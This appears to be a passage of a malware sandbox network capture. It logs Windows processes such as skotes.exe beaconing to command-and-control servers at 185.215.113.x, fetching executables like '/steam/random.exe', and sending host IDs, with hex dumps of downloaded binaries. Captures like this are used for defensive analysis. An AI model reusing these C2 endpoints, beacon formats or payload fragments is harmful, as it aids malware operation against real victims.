Nov 7, 2024 04:13:33.337691069 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 31 38 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004518031&unit=246122658369
Nov 7, 2024 04:13:34.265666008 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49979	185.215.113.16	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:34.349245071 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 7, 2024 04:13:35.251836061 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:35 GMT Content-Type: application/octet-stream Content-Length: 2765824 Last-Modified: Thu, 07 Nov 2024 02:39:59 GMT Connection: keep-alive ETag: "672c287f-2a3400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 52 4a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ RJ`Ui` @ @.rsrc`2@.idata 8@mnhiavry)):@gxujdorj *@.taggant@"*@
Nov 7, 2024 04:13:35.251996994 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:35.252038002 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:35.252094030 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:35.252110004 CET	648	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:35.252120972 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:35.252131939 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:35.252149105 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:35.252162933 CET	1236	IN	Data Raw: d3 b2 df 3e c9 f7 59 05 67 17 2b 61 b0 11 24 09 c0 24 2b 0e e7 fd 5d f9 f4 90 68 ea bd ed 07 86 fb 0b de ed ed fe 3e d5 a2 ed 02 66 9b 1a 95 85 fb 0b de 5b ec 02 3f 85 ae ed 68 fe 0b 3e bf fd 5c c2 61 8d 4e 13 e1 1f ed 06 6c 84 8b ed d8 fd 48 5c Data Ascii: >Yg+a$$+]h>f[?h>\aNlH\dTP(^$gy-T`kMzoAb>i}3Tgs\E}gba 4wQ=;es%i/>p:)[j,(;zab3Ucq)`
Nov 7, 2024 04:13:35.252176046 CET	1236	IN	Data Raw: ff fd c3 19 8d 1b 9b 8b 8e 41 d5 b0 ac af 56 90 fa 2e a4 54 71 ab 20 53 34 00 09 0b 59 12 8c fc 74 b2 4b 33 d4 b3 e5 e1 84 bc 35 13 7d 2c 30 51 b3 bb 4a f4 f5 4a 9b a3 e4 60 f2 95 e9 d8 a7 9b fd 6e 0e 36 07 df 42 52 8c 8c 9d b6 a3 8f 46 54 cc eb Data Ascii: AV.Tq S4YtK35},0QJJ`n6BRFT,c7w4Unc#.G\~y8WFr-tr,;w:etO(ebcMXNSW>rYMR1hA]l^m)s*le4SY[]\|U
Nov 7, 2024 04:13:35.257026911 CET	1236	IN	Data Raw: c6 a3 8a 98 d4 ba 8c 8f d3 10 83 60 82 87 e0 41 1b 67 8d 7e 6f 51 80 45 bc 74 51 86 7e 14 b7 2f b2 d4 56 21 b1 f4 7d 00 1d a3 c9 63 ac f0 83 0c bf dd 3b 94 ca b4 41 64 f2 db 8b fb df b8 0e c1 05 c1 2f 17 a3 2d db c1 c0 0a 87 e5 c6 c7 a8 bc 03 a8 Data Ascii: `Ag~oQEtQ~/V!}c;Ad/-uE7(&~x1kAM[%%e?>`AKr[80C"2 a{bStV\|[^0\#L"X(;%3d<]95z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50016	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:39.733120918 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004519001&unit=246122658369
Nov 7, 2024 04:13:40.647491932 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50034	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:42.274307966 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 04:13:43.172626972 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50049	185.215.113.16	80	1780	C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:44.693191051 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 7, 2024 04:13:45.595065117 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:45 GMT Content-Type: application/octet-stream Content-Length: 2163712 Last-Modified: Thu, 07 Nov 2024 02:49:06 GMT Connection: keep-alive ETag: "672c2aa2-210400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 66 c3 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,s@sf!@P.d. p.v@.rsrc .@.idata .@ p*.@rswsxqeb`YR@ekqrsvgtps @.taggant0s" @
Nov 7, 2024 04:13:45.595115900 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:45.595197916 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:45.595252037 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:45.595273018 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:45.595285892 CET	424	IN	Data Raw: 93 ce 55 b2 c4 cc e7 6b c8 e1 d2 8b 3b 90 7b 63 1c ed af d7 a0 3c 53 ae 14 89 a8 5e 5a 5f 3e f8 2c 0c ab c9 76 69 ae 61 f1 94 be 9e fb 2d 20 65 e8 d3 73 ce 69 c1 c8 63 18 ef ab 26 f8 92 a7 a1 e0 ae e3 c4 e4 ae e3 c4 18 ae e3 c4 1c ae e3 c4 10 ae Data Ascii: Uk;{c<S^Z_>,via- esic&R)N$G?E<"-zgt6bg%=MM&,h4q%?4q%?4p;&(.jLBbp53`Am&<5c!e,[/Q)vrTHYQ]XQ
Nov 7, 2024 04:13:45.595299006 CET	1236	IN	Data Raw: c4 b3 99 09 d7 95 9d fd f8 1f 47 41 37 ff 1d ac d5 56 6f 39 31 48 bf 1b 2c c1 89 81 7c 98 f6 5c 27 36 14 29 f6 8b 3e d5 a8 7e 17 09 fd 75 4d fd a7 e8 57 2a e7 cd 04 2a 03 c1 13 79 a4 f6 8c 66 50 91 51 6a 01 37 8b ba a0 41 ea cb ec 1c d2 fd 0a f8 Data Ascii: GA7Vo91H,\|\'6)>~uMW*yfPQj7A5+h52Y)<[t&Yd!ja+5 [fLB/l=jt4[9N:Fo\|hdEOnLwNifLX_EID*%oL~u
Nov 7, 2024 04:13:45.595370054 CET	1236	IN	Data Raw: fd 9b ee 74 00 44 6e cc b4 41 0d a7 cf ff 50 bc f2 55 f5 81 86 4f e0 a8 0e 3a 78 81 9d e5 8f 95 7c 49 56 05 e5 f7 3c 6e ae 39 bd bc 13 ed ca 86 b6 15 b0 71 9f 81 db 6b f5 3d f4 83 7c 85 63 65 64 f1 35 7c 6e 5f 9b 0d b1 44 fc 68 a7 1f 90 1e c7 95 Data Ascii: tDnAPUO:x\|IV<n9qk=\|ced5\|n_DhW=NgcHn0p,Mgz[<5xioBugek,@}LvNT8<]0X7DAxEm=q''onilan8x<D8dG$]h5"
Nov 7, 2024 04:13:45.595380068 CET	424	IN	Data Raw: e1 f2 66 85 fc 79 8e 45 13 0e f8 c4 00 44 9e 1d d6 de ec 8c 60 4a 38 29 38 44 e6 91 63 1a 48 b3 70 55 98 96 a7 ac 15 4d c7 f1 27 cf 90 3e 24 7f 8c 79 e2 5d 80 44 07 c6 a6 fa 47 a9 08 dc 10 25 d9 54 ec b0 9f 4e 4a 1c 39 0f 4d 55 3c 44 90 cf a3 64 Data Ascii: fyED`J8)8DcHpUM'>$y]DG%TNJ9MU<DdoFDd,N}WBoQQ\|D.RhU,ffiD?Annr_n5QL=%Vbqe4DYr?o{j=nmrHfc
Nov 7, 2024 04:13:45.595391989 CET	1236	IN	Data Raw: aa 64 a0 bb 07 3c 58 c3 be 4d 1c f2 7d 48 48 f1 6e 65 67 9d f4 b5 fb 08 b1 c5 88 8d 57 44 8c a5 6d bb 33 51 14 4d 7b 25 b1 44 e8 68 46 1f 48 1e c7 d5 57 31 3d f2 e6 cd e0 5f 4e dd a7 91 57 2d 33 f4 9b 7c 2e a5 66 b4 d6 5a 99 8c cd 69 06 a5 d8 5a Data Ascii: d<XM}HHnegWDm3QM{%DhFHW1=_NW-3\|.fZiZN6l=%dt(I.'74=)>ID\|0XDDFQ_A!?f<ffUzg}k?Y(='~@fOE*Vq78/]u=O
Nov 7, 2024 04:13:45.600101948 CET	1236	IN	Data Raw: 60 f9 b7 4d a0 e5 56 ff bf cd 73 fd 6e 75 66 9d 64 b1 0b a6 16 41 8f 81 2c 9d 66 7d fc 6a 25 23 de f5 d3 78 a8 f1 40 91 57 44 1e 91 3c be 6c 99 d0 44 3f b5 a7 d4 1b 5d 12 b9 9a 65 57 44 a8 a5 28 bb 9d 39 f0 9b 3e b4 d8 44 99 7c dc d1 0b ea 38 35 Data Ascii: `MVsnufdA,f}j%#x@WD<lD?]eWD(9>D\|85gMzEDhJ@mYXjLkpmUX5#&Dp0wNW3/$5#Efq+unn@nuO4<"im

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50050	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:44.695139885 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 04:13:45.623662949 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50065	185.215.113.206	80	6228	C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:47.223855972 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:13:48.130888939 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:13:48.169631958 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"tale------JKKFIIEBKEGIEBFIJKFI--
Nov 7, 2024 04:13:48.451277018 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50069	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:47.370307922 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 04:13:48.296725035 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50084	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:49.804666042 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 04:13:50.762254000 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50088	185.215.113.16	80	5744	C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:50.341862917 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 7, 2024 04:13:51.249798059 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:51 GMT Content-Type: application/octet-stream Content-Length: 2163712 Last-Modified: Thu, 07 Nov 2024 02:49:06 GMT Connection: keep-alive ETag: "672c2aa2-210400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 66 c3 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,s@sf!@P.d. p.v@.rsrc .@.idata .@ p*.@rswsxqeb`YR@ekqrsvgtps @.taggant0s" @
Nov 7, 2024 04:13:51.249814034 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:51.249833107 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:51.249845028 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:51.249857903 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
